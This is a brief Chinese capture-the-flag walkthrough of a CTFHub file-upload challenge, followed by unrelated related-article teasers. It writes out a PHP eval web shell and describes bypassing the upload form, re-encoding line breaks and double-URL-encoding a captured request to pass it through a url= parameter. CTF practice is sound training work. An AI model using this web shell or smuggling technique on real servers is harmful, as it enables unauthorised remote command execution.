CTFHub-上传文件

news/2025/3/11 18:07:21/

 打开网址

 新建一个文档,在其中写下面的内容,将名字该为1.php

<?php @eval($_POST[cmd]);?>

将1.php提交上去,发现没反应 

 按f12查看后发现没有提交的代码,右键编辑,自己写一个

 <input type="submit" name="submit">

 编辑代码后结果如下

 将1.php提交查询抓包

 修改一下

进行url编码 

 在记事本中,在最后加上%0A,使用替换将%0A全部替换为%0D%0A

 

 再次url编码

 将结果放到url=后面

 将前两个%253A换成:


http://www.ppmy.cn/news/1578419.html

相关文章

中国嵌入式单片机就业形势分析

此博客分析中国嵌入式单片机的就业形势&#xff0c;包括行业趋势、技能需求&#xff0c;以及不同技能水平的薪资情况。会重点探讨裸机开发与RTOS&#xff08;如FreeRTOS、TTR等&#xff09;的市场需求差异&#xff0c;以及如何提升竞争力。 行业趋势 嵌入式单片机&#xff08…

利用Java爬虫获取衣联网商品详情:实战指南

在电商领域&#xff0c;获取商品详情是数据分析和市场研究的重要环节。衣联网作为知名的电商平台&#xff0c;提供了丰富的服装商品资源。本文将详细介绍如何利用Java编写爬虫程序&#xff0c;通过商品ID获取衣联网商品详情。 一、准备工作 &#xff08;一&#xff09;环境搭…

《用Python+PyGame开发双人生存游戏!源码解析+完整开发思路分享》

导语​ "你是否想过用Python开发一款可玩性高的双人合作游戏&#xff1f;本文将分享如何从零开始实现一款类《吸血鬼幸存者》的生存射击游戏&#xff01;包含完整源码解析、角色系统设计、敌人AI逻辑等核心技术点&#xff0c;文末提供完整代码包下载&#xff01;" 哈…

后门攻击仓库 backdoor attack

在网络安全的领域中&#xff0c;后门攻击是一种常见的威胁。这种攻击方式允许攻击者在用户不知情的情况下访问设备或系统。今天&#xff0c;我将给大家分享一个持续更新的后门攻击仓库&#xff1a;backdoor attack

TTP/HTTPS、TCP/IP 协议、RPC、Socket 通信机制

1. TTP/HTTPS TTP (HTTP) 和 HTTPS&#xff08;Hypertext Transfer Protocol Secure&#xff09;是基于 TCP/IP 协议的应用层协议&#xff0c;主要用于客户端和服务器之间的数据传输。 HTTP&#xff08;超文本传输协议&#xff09;&#xff1a;这是用于 web 页面和服务器之间…

三维建模与视频融合(3D-Video Integration)技术初探。

三维建模与视频融合&#xff08;3D-Video Integration&#xff09;是一种将虚拟三维模型无缝嵌入实拍视频场景的技术&#xff0c;广泛应用于影视特效、增强现实&#xff08;AR&#xff09;、游戏开发、广告制作 、视频监控 等领域。 一、技术核心流程 三维建模与动画 使用工具…

浅说图论基础

引入 在学最短路算法之前&#xff0c;我们要先搞清楚另外一个事情&#xff0c;什么是图&#xff0c;我们又可以基于图做那些事情。 图不同于树&#xff0c;它是一种更加复杂的数据结构&#xff0c;相比较于树或者数组&#xff08;线性表&#xff09;而言&#xff0c;图的关联…

通领科技冲刺北交所

高质量增长奔赴产业新征程 日前&#xff0c;通领科技已正式启动在北交所的 IPO 进程&#xff0c;期望借助资本市场的力量&#xff0c;加速技术升级&#xff0c;推动全球化战略布局。这一举措不仅展现了中国汽车零部件企业的强大实力&#xff0c;也预示着行业转型升级的新突破。…